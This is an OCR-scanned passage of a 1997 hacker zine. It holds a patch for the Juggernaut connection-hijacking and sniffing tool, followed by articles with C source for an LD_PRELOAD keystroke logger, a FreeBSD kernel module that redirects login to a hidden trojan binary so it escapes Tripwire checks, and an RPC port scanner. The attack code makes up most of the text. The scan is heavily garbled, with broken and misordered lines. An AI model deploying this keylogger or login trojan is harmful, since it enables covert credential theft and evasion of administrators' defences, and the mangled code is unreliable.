— Connection Spying now works properly. 

— Connection RSTing and Automated connection RSTing now work better. 


Please keep the bug reports coming in! 


To extract this patchfile, use the included extraction utility to remove 
the patchfile from the article. Then simply copy it into the Juggernaut 
directory and ‘patch < juggernaut_1.0-1.2_patch* 


<t++> juggernaut_1.0-1.2_patch 


NumberOneCrush/main.c Thu May 8 15:37:02 1997 
NumberOneCrush/main.c Fri Jun 6 01:33:42 1997 
@@ -1,7 +1,7 @@ 

/* 
* 
is Juggernaut 
=a Version b2 
Hi Se Version 1.2 
* 
i: 1996/7 Guild productions 
* 


daemon9 [guild|phrack|r00t] 
@@ -42,7 +42,7 @@ 
define DEVICE "eth0" 


define LOGFILE "./juggernaut.log.spy" 
-char version[]="1.0\0"; 
+tchar version[]="1.2"; 
int sigsentry=1; /* Signal sentry */ 
int ripsock=0; /* RIP socket */ 
int linksock=0; /* SOCK PACKET socket */ 


@@ -96,8 +96,8 @@ 
char buf [MINIBUF]={0}; 
char token[2*MINIBUF]={0}; 


Inte 6; 
- if (geteuid() | |getuid()) { /* v00t? */ 
+ if (geteuid() | |getuid()) { /* c00t? */ 
fprintf(stderr,"UID or EUID of 0 needed...\n") 
exit (0); 


} 
@@ -279,7 +279,7 @@ 
fgets (buf, sizeof (buf), amen 


f (buf [0] ==0x0a| | buf [0]==’q’) return; 
See een ay ee ee 
- if (! (target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); 
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+ if (! (target=checkc (val) 
else break; 


} 


fprintf(stderr,"\nDo you wish to log to a file as well? 


2 2017 2 


)) fprintf(stderr,"Connection not in database.\n"); 


[y/N] >"); 


='q’) return; 
continue; 
queue. \n"); 


)) 
)) fprintf(stderr, "Connection not in 
)) database.\n"); 


fprintf(stderr, "Connection not in 


@@ -324,7 +324,7 @@ 
fgets (buf, sizeof (buf),stdin); 
if (buf [0]==0x0a| |buf [0] 
if (! (int) (val=atoi (buf) 
7 if (! (target=checkc (val) 
+ if (! (target=checkc (val) 
else break; 
} 
signal (SIGINT, convulsion) ; 
@@ -440,7 +440,7 @@ 


fprintf(stderr, 


a fprintf(stderr, 
+ fprintf(stderr, 
ifdef MULTI_P 
fprintf(stderr, 
endif 
-501,7 


ee +501,7 @@ 


"Juggernaut 


"\nBuilt on %s %s with the following options:\n", 


$s route@infonexus.com [guild 1996/7]\n",version) ; 


"\nJuggernaut compiled with the following options:\n"); 


DATE__, 


TIM 


E 


" Multi-processing\n"); 


fgets (buf, sizeof (buf),stdin); 


if (buf [0]==0x0a| |buf [0] 
if (! (int) (val=atoi (buf) 
- if (! (target=checkc (val 
+ if (! (target=checkc (val 
else break; 


L) 
L) 


} 


=='q’) return; 

)) continue; 

)) fprintf(stderr,"Connection not in queue.\n"); 

)) fprintf(stderr,"Connection not in database.\n"); 


if (ntohs (target-—>dport) !=23) { 


@@ -547,7 +547,7 @@ 
fgets (buf, sizeof (buf),stdin); 
if (buf [0]==0x0a| |buf[0]=='q’) return; 
i1f(! (int) (val=atoi (buf) )) continue; 
om if (! (target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); 
+ if(! (target=checkc(val)))fprintf(stderr,"Connection not in database.\n"); 
else break; 
} 
if (ntohs (target-—>dport) !=23) { 
NumberOneCrush/mem.c Thu May 8 15:37:02 1997 
+++ NumberOneCrush/mem.c Fri Jun 6 01:33:09 1997 
@@ -1,7 +1,7 @@ 
/* 
* 
. Juggernaut 
=F Version bl 
b> ot Version 1.2 
* 
* 1996/7 Guild productions 
x daemon9 [guild|phrack|r00t] 
NumberOneCrush/menu.c Thu May 8 15:37:02 1997 
+++ NumberOneCrush/menu.c Fri Jun 6 01:33:32 1997 
@@ -1,7 +1,7 @@ 
/* 
* 
ms Juggernaut 
=e Version b2 
A %, Version 1.2 
* 
* 1996/7 Guild productions 
* daemon9[guild|phrack|r00t] 
NumberOneCrush/net.c Thu May 8 15:37:02 1997 
+++ NumberOneCrush/net.c Fri Jun 6 01:32:56 1997 
@@ -1,7 +1,7 @@ 
/* 


Juggernaut 
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Version bl 
Version 1.2 


1996/7 Guild productions 
daemon9 [guild|phrack|r00t] 


@@ -92,13 +92,14 @@ 
* mode. 


aA 


-int tap (device) 

tint tap (device, mode) 
char *device; 

+int mode; 


{ 


int fd; 

struct ifreq ifr; /* Link-layer interface request structure */ 
- /* Ethernet code for IP 0x800==ETH_P_IP */ 
+ /* Ethernet code for IP 0x0800==ETH_P_IP */ 


if ((fd=socket (AF_INET, SOCK_PACKET, htons (ETH_P_IP) )) <0) { 


wy 
ry 
ay 
ry 


if (verbosity) perror("(tap) SOCK_PACKET allocation problems [fatal]"); 
exit (1); 
@@ -109,16 +110,22 @@ 
close (fd); 
exit (1); 
} 
- ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */ 
+ if (!mode)ifr.ifr_flags*=IFF_PROMISC; /* Unset promiscuous mode */ 
+ else ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */ 
if ((ioctl (fd, SIOCSIFFLAGS, &ifr) ) <0) { /* Set flags */ 
- if (verbosity) perror("(tap) Can’t set promiscuous mode [fatal]"); 
+ if (verbosity) perror("(tap) Can’t set/unset promiscuous mode [fatal]"); 
close (fd); 
exit (1); 


} 
- return (fd); 
4 if (!mode) { 
+ close (fd); 
cfs return (0); 
+ } 
+ else return(fd); 


Gimme a raw-IP socket. Use of IP_HDRINCL is automatic with 2.0.x 
kernels. Not sure about 1.2.x 
@@ -197,7 +204,6 @@ 

case 22: 

case 23: 

case 25: 
7 case 80: 

case 513: 

case 6667: 

if (((int)msg=addc (iphp,tcphp)))if (verbosity) fprintf(stderr, "%Sc%s",0x08,msqg) ; 

@@ -235,7 +241,6 @@ 

case 22: 

case 23: 

case 25: 
7 case 80: 

case 513: 

case 6667: 

if (((int)msg=delc(iphp,tcphp)))if (verbosity) fprintf (stderr,"%Sc%s",0x08,msqg) ; 

@@ -261,7 +266,7 @@ 
void dumpp(char *,int,FILE *); 


extern int sigsentry; 
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- int tlinksock=tap (DEVICE); /* Spying tap. XXX- Really dumb way to do this... */ 

+ int tlinksock=tap(DEVICE,1); /* Spying tap. XXX- Really dumb way to do this... */ 
time_t tp; 


ALIGNNETPOINTERS () ; 
@@ -272,20 +277,14 @@ 
time (&tp) ; 
fprintf(fp,": Log started:\t\t%s 
\n",ctime(&tp)); 


} 
- /* NO alaram timeout here. SIGINT kills our spy session */ 
= while (sigsentry) if (recv (tlinksock, &epack, sizeof (epack) ,0)) if (iphp->protocol==IPPROTO_T 
CP) if (iphp->saddr==target—>daddré&tcphp->source==target—>dport) dumpp (epack.payload-2,htons ( 
iphp->tot_len) -sizeof (epack.ip) -sizeof (epack.tcp),fp); 
+ /* NO alarm timeout here. SIGINT kills our spy session */ 
+ while (sigsentry) if (recv (tlinksock, &epack, sizeof (epack) ,0)) if (iphp->protocol==IPPROTO_T 
CP) if (iphp->saddr==target-—>daddr && iphp->daddr==target-—>saddr && tcphp->dest==target-—>spor 
t) dumpp (epack.payload-2,htons (iphp->tot_len) -sizeof (epack.ip) -sizeof (epac 


k 


+.tcp),fp); 


if (fp) { 
fprintf(fp,"\n 
-\n: Juggernaut connection spy log trailer\n: %s [%d]\t-->\t %s [%d]\n",hostLookup (target-> 
saddr),ntohs (target-—>sport), hostLookup (target-—>daddr) ,ntohs (target-—>dport 


time (&tp); 
fprintf(fp,": Log ended:\t\t%s 
\n",ctime(&tp)); 
@@ -347,8 +346,8 @@ 
unsigned short tlen; 
}*ppheader; 


- static int moot=0; 

= int tlinksock=tap (DEVICE) ; 
+ int moot=0; 
+ int tlinksock=tap (DEVICE,1); 


ALIGNNETPOINTERS () ; 


@@ -451,7 +450,7 @@ 
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extern int ripsock; 
extern int acrstpid; 
char *tempBuf=0; 

- int tlinksock=tap (DEVIC 


1’ 
+ int tlinksock=tap (DEVICE,1); 
switch ((acrstpid=fork())) { /* Drop a child to backround, return the 
parent to continue */ 
@@ -570,7 +569,7 @@ 
extern int netreadtimeout; 
static int len; 
char *tempBuf; 
- int tlinksock=tap (DEVICE) ; 
+ int tlinksock=tap (DEVICE,1); 
ALIGNNETPOINTERS () ; 
@@ -675,7 +674,7 @@ 
extern int netreadtimeout; 
extern int sigsentry; 
static int len; 
= int tlinksock=tap (DEVICE) ; 
+ int tlinksock=tap (DEVICE,1); 
ALIGNNETPOINTERS () ; 
@@ -799,7 +798,7 @@ 
int grabflag=0; /* Time to grab some packets */ 
unsigned long targetsourceip=0; 
unsigned short targetsourceport=0; 
a int tlinksock=tap (DEVICE) ; 
+ int tlinksock=tap (DEVICE,1); 


if(! (fp=fopen (SNIFLOG, "at"))) { /* Log to file */ 
if (verbosity) { 
NumberOneCrush/prometheus.c Thu May 8 15:37:03 1997 
+++ NumberOneCrush/prometheus.c Fri Jun 6 01:33:17 1997 
@@ -1,7 +1,7 @@ 
/ 


* 
* 
* Juggernaut 
= ah Version b2 
as Version 1.2 
* 
* 1996/7 Guild productions 
* daemon9 [guild|phrack|r00t] 
NumberOneCrush/surplus.c Thu May 8 15:37:03 1997 
+++ NumberOneCrush/surplus.c Fri Jun 6 01:33:03 1997 
@@ Sip Teg of @@ 
/* 
* 
Juggernaut 
reas Version b2 
+ * Version 1.2 
* 
* 1996/7 Guild productions 
" daemon9 [guild|phrack|r00t] 


@@ -29,6 +29,7 @ 


Aw ®e 


#define HELPFIL "./ClothLikeGauze/.help" 
#define FBUFSIZI 80 
#define MINIBUF 10 

+#define DEVICE "etho" 


extern int verbosity; 


@@ -346,6 +347,7 @@ 
void cleanexit () { 
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void powerdown () ; 
+ int tap(char *,int); 


extern int ripsock; 
extern int hpid; 
@@ -353,6 +355,7 @@ 


close (ripsock) ; 
powerdown (); 


+ tap (DEVICE, 0) ; /* Unset promisc mode on the interface */ 
if (kill (hpid, SIGUSR1))if (verbosity) { /* Send signal to the hunter */ 
perror("(cleanexit) Could not signal hunter"); 
fprintf(stderr, "[cr]"); 
<--> 
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[ Shared Library Redirection Techniques 


SaaS SSS [ halflife <halflife@infonexus.com> 


This article discusses shared libraries - in particular, a method for doing 
shared library based function call redirection for multiple purposes. During 
the process of writing some code, some bugs were discovered in a few shared 
library implementations, these are discussed as well. 


First off, a short description of shared libraries is in order. Shared 
libraries are designed to let you share code segments among programs. In this 
way, memory usage is reduced significantly. Since code segments generally are 
not modified, this sharing scheme works rather well. Obviously for this to 
work, the code segments have to be location independent or PC indepenant (ip 
independant for the x86 programmers in the audience). 


Now, Since the telnetd environment variable hole, most of you know there 
are several environment variables that can be used to specify alternate shared 
libraries. Among them, on most systems, are LD_LIBRARY_PATH and LD_PRELOAD; 
this article strictly deals with the latter. Additionally, on Digital UNIX 
and Irix, this variable is called _RLD_LIST and has a slightly different 
syntax. 


Sun’s shared libraries came with an API to let users load and call shared 


library functions; most other vendors have cloned the interface. Oddly enough, 
our code will not work in SunOS, although it will in Solaris2. Anyhow, the 
first function to be concerned with is called dlopen(). This function 


basically loads the shared library and mmap()s it into memory if it is not 
already loaded. The first argument it accepts, is a pointer to the filename 
to be loaded, the second argument should usually be 1 (although some platforms 
seem to support other options). The manpage provides more details. A handle 
is returned on success, you can call dlerror() to determine if a failure 
occurred. 


Once you have dlopen()ed a library, the next goal is to get the address of one 
or more of the symbols that are inside the library. You do this with the 
disym() function. Unfortunately, this is where things can get nonportable. 

On the freely available 4.4BSD machines I tested, dlsym() wants the function 
name prepended by a underscore character. This makes perfect sense to me, 
since that is how C stores function names internally. The System Vish 
implementations, which make up the majority of the tested systems, do not use 
such a convention. This, unfortunately, means you must use conditional 
compilation in order to ensure portability. 


A simple example of opening a library, getting a function and calling it is 
shown below: 


<++> sh_lib_redir_example.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
include <dlfcn.h> 


main() 


void *handle; 
void (*helloworld) (void); 
char: 2G 


handle = dleopen("/tmp/helloworld.so", 1); 
c = dlerror(); 

if(c) 

{ 
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fprintf(stderr, "couldnt open /tmp/helloworld.so\n"); 


abort (); 
} 
if _ FreeBSD __ 
helloworld = dlsym(handle, "_helloworld"); 
else 
helloworld = dlsym(handle, "helloworld"); 
endif 
c = dlerror(); 
if(c) 
{ 
fprintf(stderr, "couldnt get helloworld symbol\n"); 
abort (); 
} 
helloworld(); 
dlclose (handle); 
} 
<--> 


Okay, now that we understand how to use the programming interface, how do we 
do function call redirection? Well, my idea is simple; you preload a library, 
the preloaded library does its thing, then it dlopen()s the real library and 
gets the symbol and calls it. This seems to work well on Solaris, Linux (ELF), 
Irix (5.3 and 6.2), FreeBSD (see bugs section below), and OSF/1 (not tested). 


Compiling shared libraries is a little different on each platform. The 
compilation stage is basically the same, it is the linking that is actually 
different. For GCC, you make the object with something like: 


gcc -fPIC -c file.c 


That will create file.o, object code which is suitable for dynamic linking. 
Then you actually have to link it, which is where the fun begins :). Here is 
a chart for linking in the various operating systems I have tested this stuff 
on. 


FreeBSD: ld -Bshareabl o file.so file.o 
Solaris: ld -G -o file.so file.o -ldl 

Linux: ld -Bshareabl OvEiLe.so filevo,.-—Ldl 
IRIX: ld -shared -o file.so file.o 

OSF/1: ld -shared -o file.so file.o 


On IRIX, there is an additional switch you need to use if you are running 6.2, 
it enables backwards ld compatibility; the manpage for ld is your guide. 


Unfortunately, all is not happy in the world of shared libs since there are 
bugs present in some implementations. FreeBSD in particular has a bug in that 
if you dlsym() something and it is not found, it will not set the error so 
dlerror() will return NULL. OpenBSD is far far worse (*sigh*). It 
initializes the error to a value, and does not clear the error when you call 
dlerror() so at all times, dlerror() will return non NULL. Of course, OpenBSD 
is incompatible with our methods in other ways too, so it does not really 
matter I guess :). The FreeBSD bug is hacked around by testing return values 
for NULL. 


Here is a simple TTY logger shared library example. When you preload it, it 
will log the keystrokes when users run any nonprivledged shared lib using 
program. It stores the logs in /tmp/UID_OF_USER. Pretty simple stuff. 


< 


+> tty_logger.c 
nclude <stdio.h> 
nclude <stdlib.h> 
nclude <unistd.h> 
nclude <sys/types.h> 
nclude <sys/uio.h> 
nclude <sys/stat.h> 
nclude <string.h> 
nclude <fcntl.h> 


Pep pe pe pe pp pp 
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define 
define 
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include <dlfcn.h> 


LIB_PATH 


int logfile = -1 


"/usr/lib/libc.so.3.0" 


F 


LOGDIR "/tmp" 


static void createlog(void) 


{ 


} 


char buff[4096]; 
!= -1) 
return; 
memset (buff, 
if(strlen(LOGDIR) > 4000) 
return; 


if (logfi 


sprintf (buff, "%s/%d", LOGDIR, getuid()); 
O_WRONLY|O_CR 


logfile 
return; 


le 


open (buff, 


0, 4096); 


static void writeout (char c) 


{ 


} 


switch(c 


{ 


) 


ca 
ca 


se 
se 


Cin! s 

WN aEG 8 
Cue Nes 
write(logfile, &c, 
break; 


case 27: 


break; 


default: 


ssize_t read(int fd, 


{ 


write(logfile, &c, 


dye 


1); 


void *buf, size_t nbytes) 


void *handle; 


ssize_t 


(*realfunc) (int, void *, size_t); 


int result; 


c Bon srmeali 
char *c; 
Ghiat «<a: 


handle = 


dlopen(LIB_PATH, 1); 


if (!handle) 
return -1; 


if linux || (_ svr4 & & sun__) | 
realfunc = dlsym(handle, "read"); 
else 
realfunc = dlsym(handle, "_read"); 
endif 


if (!realfunc) 

return -1; 

if(logfile < 0) 

createlog(); 

realfunc(fd, buf, nbytes) 


result = 
c = buf; 


if (isatty (fd) ) 


{ 


if (result > 0) 
for(i=0O;i < result;it++) 


{ 
d= c[i 


sgi 


a 


li 
writeout (d); 


/* change this to point to your libc shared lib path */ 


EAT |O_APPEND, 


E 


_ osf__ 


S_IRUSR|S_IWUSR) ; 
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return result; 


EOF 
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[ Bypassing Integrity Checking Systems 
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In this day and age where intrusions happen on a daily basis and there is a 
version of "rootkit" for every operating system imaginable, even mostly 
incompetent system administration staff have begun doing checksums on their 
binaries. For the hacker community, this is a major problem since their very 
clever trojan programs are quickly detected and removed. Tripwire is a very 
popular and free utility to do integrity checking on UNIX systems. This 
article explores a simple method for bypassing checks done by tripwire and 
other integrity checking programs. 


First off, how do integrity-checking programs work? Well, when you first 
install them, they calculate a hash (sometimes multiple hashes) of all the 
binary files you wish to monitor. Then, periodically, you run the checker 
and it compares the current hash with the previously recorded hash. If the 
two differ, than something funny is going on, and it is noted. Several 
different algorithms exist for doing the hashes, the most popular probably 
being the MD5 hash. 


In the past, there have been problems with several hashes. MD5 has had some 
collisions, as have many other secure hash algorithms. However, exploiting the 
collisions is still very very difficult. The code in this article does not 
rely on the use of a specific algorithm, rather we focus on a problem of trust 
—- integrity checking programs need to trust the operating system, and some 
may even trust libc. In code that is designed to detect compromises that 
would by their very nature require root access, you can not trust anything, 
including your own operating system. 


The design of twhack had several requirements. The first is that it need not 
require a kernel rebuild; loadable kernel modules (lkm) provided a solution 

to this. The second is that it need be relatively stealthy. I managed to find 
a simple way to hide the lkm in the FreeBSD kernel (probably works in OpenBSD 
and NetBSD although I have not verified this). Once you load the module, the 
first ls type command will effectively hide the module from view. Once hidden 
it can not be unloaded or seen with the modunload(8) command. 


First, a little information on FreeBSD loadable modules. I am using the MISC 
style of modules, which is basically similar to linux modules. It gives you 
pretty much full access to everything. LKM info is stored in an array of 
structures. In FreeBSD 2.2.1 the array has room for 20 modules. 


Hiding the modules is really quite simple. There is a used variable that 
determines if the module slot is free or not. When you insert a module, the 
device driver looks for the first free modul ntry £7 being defined as 
an entry with 0 in the used slot and places some info in the structure. The 
info is mainly used for unloading, and we are not interested in that, so it is 
okay if other modules overwrite our structure (some might call that a feature, 
even). 


Next we have to redirect the system calls we are interested in. This is 
somewhat similar to Linux modules as well. System calls are stored in an 
array of structures. The structure contains a pointer to the system call and 
a variable specifying the number of arguments. Obviously, all we are 
interested in is the pointer. First we bcopy the structure to a variable, 
then we modify the function pointer to point to our code. In our code we can 
do stuff like old_function.sy_call(arguments) to call the original system call 
-- guick and painless. 


Now that we know HOW to redirect system calls, which ones do we redirect in 
order to bypass integrity checkers? Well, there are a number of possibilities. 
You could redirect open(), stat(), and a bunch of others so that reads of your 
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modified program redirect to copies of the unmodified version. I, however, 
chose the opposite approach. Execution attempts of login redirect to another 
program, opens still go to the real login program. Since we don’t want our 
alternative login program being detected, I also modified getdirentries so 
that our program is never in the buffer it returns. Similar things probably 
should have been done with syscall 156 which is old getdirentries, but I don’t 
think it is defined and I don’t know of anything using it, so it probably does 
not really matter. 


Despite the attempts at keeping hidden, there are a few ways to detect this 


code. One of the ways of detecting (and stopping) the code is provided. 
It is a simple stealthy module that logs when syscall addresses change, and 
reverses the changes. This will stop the twhack module as provided, but is 


FAR from perfect. 


What the checking code does is bcopy() th ntire sysent array into a local 
copy. Then it registers an at_fork() handler and in the handler it checks 
the current system call table against the one in memory, if they differ it 
logs the differences and changes the entry back. 


<++> twhack/Makefile 

€C=gec 

LD=ld 

RM=rm 

CFLAGS=-O -DKERNEL -DACTUALLY_LKM NOT_KERNEL S$ (RST) 
LDFLAGS=-r 
RST=-DRESTORE_SYSCALLS 


e5 


all: twhack syscheck 
twhack: 
$(CC) $(CFLAGS) -c twhack.c 
$(LD) S$(LDFLAGS) -o twhack_mod.o twhack.o 
@$ (RM) twhack.o 
syscheck: 
$(CC) S$(CFLAGS) -c syscheck.c 
S(LD) $(LDFLAGS) -o syscheck_mod.o syscheck.o 
@S (RM) syscheck.o 
clean: 
S(RM) -f *.0o 
<--> 
<++> twhack/twhack.c 
/* 


*x This code is a simple example of bypassing Integrity checking 
** systems in FreeBSD 2.2. It has been tested in 2.2.1, and 


** believed to work (although not tested) in 3.0. 
xk* 


** Halflife <halflife@infonexus.com> 


a 

/* change these */ 

define ALT_LOGIN_PATH "/tmp/foobar" 
define ALT _LOGIN_BASE "foobar" 

/* 


includes */ 

nclude <sys/param.h> 
nclude <sys/ioctl.h> 
nclude <sys/proc.h> 
nclude <sys/systm.h> 
nclude <sys/sysproto.h> 
nclude <sys/conf.h> 
nclude <sys/mount.h> 
nclude <sys/exec.h> 
nclude <sys/sysent.h> 
nclude <sys/lkm.h> 
nclude <a.out.h> 
nclude <sys/file.h> 


Pepe pe pe pe pe pe pe pe ee ae 
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include <sys/errno.h> 
include <sys/syscall.h> 
include <sys/dirent.h> 


/* storage for original execve and getdirentries syscall 
static struct sysent old_execve; 
static struct sysent old_getdirentries; 


entries */ 


/* prototypes for new execve and getdirentries functions */ 
int new_execve __P((struct proc *p, void *uap, int retval[])); 
int new_getdirentries _ P((struct proc *p, void *uap, int retval[])); 


/* flag used for the stealth stuff */ 
static int hid=0; 


/* table we need for the stealth stuff */ 
static struct lkm_table *table; 


/* misc lkm */ 
MOD_MISC (twhack) ; 


/* 


**x this code is called when we load or unload the module. 


** only possible if we initialize hid to l 
xy 

static int 

twhack_load(struct lkm_table *1l, int cmd) 
{ 


int err = 0; 
switch (cmd) 
{ 

/* 


unload is 


** save execve and getdirentries system call entries 
** and point function pointers to our code 


oa 
case LKM_E_ LOAD: 
if (lkmexists(l)) 
return (EEXIST); 


bcopy (&sysent [SYS_execve], &old_execve, 


sysent [SYS_execve].sy_call = new_execve; 


bcopy (&sysent [SYS_getdirentries] 
sysent)); 


sysent [SYS_getdirentries].sy_call = new_getdirentries; 
table = 1; 
break; 


, &old_getdirentries, 


sizeof (struct sysent)); 


sizeof (struct 


/* restore syscall entries to their original condition */ 


case LKM_E_ UNLOAD: 


bcopy (&old_execve, &sysent[SYS_execve], 
bcopy (&old_getdirentries, &sysent[SYS_getdirentries], 


sysent)); 
break; 
default: 
err = EINVAL; 
break; 


} 


return(err); 


} 


/* entry point to the module */ 
int 
twhack_mod(struct lkm_table *1l, int cmd, int ver) 
{ 
DISPATCH(1, cmd, ver, twhack_load, twhack_load, 


lkm_nullcmd) ; 


} 
/* 


** execve is simple, if they attempt to execute /usr/bin 
** we change fname to ALT_LOGIN_PATH and then call the o 


/login 
ld execve 


sizeof (struct sysent)); 


sizeof (struct 
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*K* 


#/ 


system call. 


int 
new_execve (struct proc *p, void *uap, int *retval) 


{ 


} 
/* 


xK* 
*K* 


struct execve_args *u=uap; 


if(!strcemp(u->fname, "/usr/bin/login") ) 
strcpy (u->fname, ALT_LOGIN_PATH); 
return old_execve.sy_call(p, uap, retval); 


in getdirentries() we call the original syscal 


then nuke any occurance of ALT _LOGIN_BAS 


a 
G 


Pie 


ll first 
ALT_LOGIN_PATH 


haracters. 


** and ALT_LOGIN_BASE should _always_ be modified and made 
** very obscure, perhaps with upper ascii c 

ine 

int 


new_getdirentries(struct proc *p, void *uap, 


{ 


struct getdirentries_args *u=uap; 
struct dirent *dep; 

int nbytes; 

Int. sk; pe 


int *retval) 


/* if hid is not set, set the used flag to 0 */ 


if (!hid) 
{ 
table->used = 0; 
hidt++; 
} 
r = old_getdirentries.sy_call(p, uap, 
nbytes = *retval; 


while (nbytes > 0) 
{ 


dep = (struct dirent *)u->buf; 
if (!strcmp (dep->d_name, ALT_LOGIN_BAS! 


{ 


retval); 


i = nbytes dep->d_reclen; 


GJ 


)) 


bcopy (u->buf+dep->d_reclen, 


*retval = i; 
return r; 
} 
nbytes dep->d_reclen; 
u->buf + dep->d_reclen; 


} 


return r; 


<++> twhack/syscheck.c 


Pepe pe pe pe pe pe pe ee pe ee ee 


nclude <sys/param.h> 
nclude <sys/ioctl.h> 
nclude <sys/proc.h> 
nclude <sys/systm.h> 
nclude <sys/sysproto.h> 
nclude <sys/conf.h> 
nclude <sys/mount.h> 
nclude <sys/exec.h> 
nclude <sys/sysent.h> 
nclude <sys/lkm.h> 
nclude <a.out.h> 
nclude <sys/file.h> 
nclude <sys/errno.h> 
nclude <sys/syscall.h> 


nclude <sys/dirent.h> 


static int hid=0; 


u->buf, 


nbytes-dep->d_reclen) ; 
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static struct sysent table[SYS_MAXSYSCALL]; 

static struct lkm_table *boo; 

MOD_MISC (syscheck) ; 

void check_sysent (struct proc *, struct proc *, int); 


static int 
syscheck_load(struct lkm_table *1, int cmd) 
{ 
int err = 0; 
switch (cmd) 
{ 
case LKM_E_ LOAD: 
if (lkmexists(l)) 
return (EEXIST); 
bcopy(sysent, table, sizeof(struct sysent) *SYS_MAXSYSCALL) ; 
boo=l; 
at_fork (check_sysent) ; 
break; 
case LKM_E_ UNLOAD: 
rm_at_fork (check_sysent) ; 
break; 
default: 
err = EINVAL; 
break; 


} 


return(err); 


int 
syscheck_mod(struct lkm_table *l, int cmd, int ver) 


{ 
DISPATCH(l1, cmd, ver, syscheck_load, syscheck_load, lkm_nullcmd) ; 


} 


void 
check_sysent (struct proc *parent, struct proc *child, int flags) 
{ 
int i; 
if ('hid) 
{ 
boo->used = 0; 
hidt++; 
} 
for(i=0;1 < SYS_MAXSYSCALL; i++) 
{ 
if(sysent[i].sy_call != table[i].sy_call) 
{ 


printf ("system call %d has been modified (old: %p new: %p)\n", 


able[i].sy_call, sysent[i].sy_call); 
ifdef RESTORE_SYSCALLS 
sysent[i].sy_call = table[i].sy_call; 


endif 


i, 
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Remote Procedure Language is a specification for letting procedures be 
executable on remote machines. It is defined in rfcl831. It has a number of 
good traits, and if you run SunOS or Solaris, you are almost required to make 
use of it to some degree. 


Unfortunately, there are vulnerabilities in some RPC services that have 

caused many machines to be penetrated. Many administrators block access to 
portmapper (port 111) in an effort to deny external users access to their weak 
RPC services. 


Unfortunately, this is completely inadequate. This article details how 
trivial it is to do a scan for specific RPC program numbers. The scan can be 
performed relatively quickly, and in many cases will not be logged. 


First, a little information about RPC itself; when I refer to RPC, I am only 
referring to ONC RPC, and not DCE RPC. RPC is a query/reply-based system. You 
send an initial query with the program number you are interested in, the 
procedure number, any arguments, authentication, and other needed parameters. 
In response, you get whatever the procedure returns, and some indication of 
the reason for the failure if it failed. 


Since RPC was designed to be portable, all arguments must be translated into 
XDR. XDR is a data encoding language that superficially reminds me a little 
bit of Pascal (at least, as far as strings are concerned). If you want more 

information on XDR, it is defined in rfcl832. 


As you probably surmised by now, RPC programs are made up of various 
procedures. There is one procedure that always exists, it is procedure 0. 
This procedure accepts no arguments, and it does not return any value (think 
void rpcping(void)). This is how we will determine if a given port holds a 
given program, we will call the ping procedure! 


So now we have a basic idea on how to determine if a given port is running 
a given RPC program number. Next we need to determine which UDP ports are 
listening. This can be done a number of ways, but the way I am using is 
to connect() to the port and try write data. If nothing is there, we 

will (hopefully) get a PORT_UNREACH error in errno, in which case we know 
there is nothing on that port. 


In the given code, we do a udp scan, and for every listening udp port, we 
try to query the ping procedure of the program number we are scanning for. 
If we get a positive response, the program number we are looking for exists 
on that port and we exit. 


<++> RPCscan/Makefile 
CC=gcc 
PROGNAME=rpcscan 
CFLAGS=-c 


build: checkrpc.o main.o rpcserv.o udpcheck.o 
S$(CC) -o $(PROGNAME) checkrpc.o main.o rpcserv.o udpcheck.o 


checkrpc.o: 
$(CC) S(CFLAGS) checkrpc.c 


main.o: 


$(CC) $(CFLAGS) main.c 


rpcserv.o: 
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S$(CC) S(CFLAGS) rpcserv.c 


udpcheck.o: 
S$(CC) S(CFLAGS) udpcheck.c 


clean: 

rm -f *.o S (PROGNAME) 
<--> 
<++> RPCscan/checkrpc.c 


include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 
#include <sys/time.h> 
include <sys/socket.h> 
include <rpc/rpc.h> 
include <netdb.h> 


extern struct sockaddr_in *saddr; 


int 
check_rpc_service (long program) 
{ 
int sock = RPC_ANYSOCK; 
CLIENT *client; 
struct timeval timeout; 
enum clnt_stat cstat; 


timeout.tv_sec = 10; 
timeout.tv_usec = 0; 
client = clntudp_create(saddr, program, 1, timeout, &sock); 


if (!'client) 

return -1; 
timeout.tv_sec = 10; 
timeout.tv_usec = 0; 
cstat = RPC_TIMEDOUT; 
estat = clnt_call(client, 0, xdr_void, NULL, 
if(cstat == RPC_TIMEDOUT) 
{ 


timeout.tv_sec = 10; 
timeout.tv_usec = 0; 


cstat = clnt_call(client, 0, xdr_void, NULL, 


int_destroy (client); 

lose (sock); 

F(cstat == RPC_SUCCESS) 

return 1; 

else if (cstat == RPC_PROGVERSMISMATCH) 
return 1; 

else return 0; 


HAQQ~ 


} 

<--> 

<++> RPCscan/main.c 
include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 


int check_udp_port (char *, u_short); 
int check_rpc_service (long) ; 

long get_rpc_prog_number(char *); 
define HIGH_PORT 5000 

#define LOW_PORT 512 


main(int argc, char **argv) 


Int. i475)7 

long prog; 
if(arge != 3) 
{ 


xdr_void, NULL, 


xdr_void, NULL, 


timeout) ; 


timeout) ; 


10.txt 


} 


<--> 
<++> RPCscan/rpcserv.c 


bi 


He Be Be Be 


lo 


Pepe pe pe pe pe pe pe pe pe 


ak 


Nc 
Nc 
Nc 
Nc 
nc 
Nc 


Ng 


nc] 


lude 
lude 
lude 
lude 
lude 
lude 
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fprintf(stderr, "%s host program\n", argv[0]); 
exit (0); 
} 
prog = get_rpc_prog_number (argv[2]); 
if (prog == -1) 
{ 
fprintf(stderr, "invalid rpc program number\n"); 
exit (0); 
} 
printf("Scanning %s for program d\n", argv[1], prog); 
for (i=LOW_PORT;i <= HIGH_PORT; i++) 
{ 
if (check_udp_port(argv[1l], i) > 0) 
{ 
if (check_rpc_service (prog) == 1) 


{ 


printf("%Ss is on port %u\n", argv[2], 


exit (0); 


<stdio.h> 
<stdlib.h> 
<unistd.h> 
<netdb.h> 
<ctype.h> 
<rpc/rpce.h> 


get_rpc_prog_number (char *progname) 


struct rpcent *r; 
int i=0; 


while (progname[i] != ’\0’) 
{ 
if (!isdigit (progname[i]) ) 
{ 
setrpcent (1); 
r = getrpcbyname (progname) ; 
endrpcent (); 
if('r) 
return -1; 
else return r->r_number; 


itt; 


return atoi(progname) ; 


RPCscan/udpcheck.c 


de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 
de 


<stdio.h> 
<stdlib.h> 
<unistd.h> 
<string.h> 
<netdb.h> 
